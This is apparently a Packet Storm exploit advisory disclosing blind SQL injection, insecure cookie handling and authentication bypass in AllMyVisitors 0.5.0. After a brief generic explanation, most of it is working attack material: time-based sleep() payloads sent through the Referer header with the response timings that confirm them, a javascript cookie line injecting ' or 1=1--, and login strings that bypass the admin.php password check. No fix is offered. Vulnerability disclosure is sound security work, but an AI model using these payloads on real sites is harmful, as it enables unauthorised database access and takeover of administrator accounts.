AllMyVisitors version 0.5.0 suffers from multiple remote blind SQL injection vulnerabilities related to authentication bypass during login, cookie handling, and header handling.
352c44152e3fc4d8542ed9a4dae4f7fd788f7572a22248f0a2ced71ce2342ba6AllMyVisitors0.5.0 Blind SQL Injection Vulnerability
====================================================
Author : indoushka
Vondor : http://www.php-resource.net/
Dork: Copyright (c) 2004 by voice of web
==========================
SQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and doesn't properly filter out dangerous characters.
This is one of the most common application layer attacks currently being used on the Internet. Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable.
This vulnerability affects /AllMyVisitors0.5.0/.
Discovered by: Scripting (Blind_Sql_Injection.script).
Attack details
HTTP Header input Referer was set to if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/
Tests performed:
if(now()=sysdate(),sleep(2),0)/*'XOR(if(now()=sysdate(),sleep(2),0))OR'"XOR(if(now()=sysdate(),sleep(2),0))OR"*/ => 6.099 s
if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ => 18.439 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.561 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.558 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.515 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.53 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.468 s
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/ => 12.496 s
if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ => 0.577 s
Insecure Cookie Handling :
admin.php
javascript:document.cookie="allmyphp_cookie=' or ' 1=1--;path=/";
Auth Bypass :
admin.php
Username : azerty' or '1=1--# Real admin name
Password : demo1 ' or ' 1=1 or ADmin or any thing
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed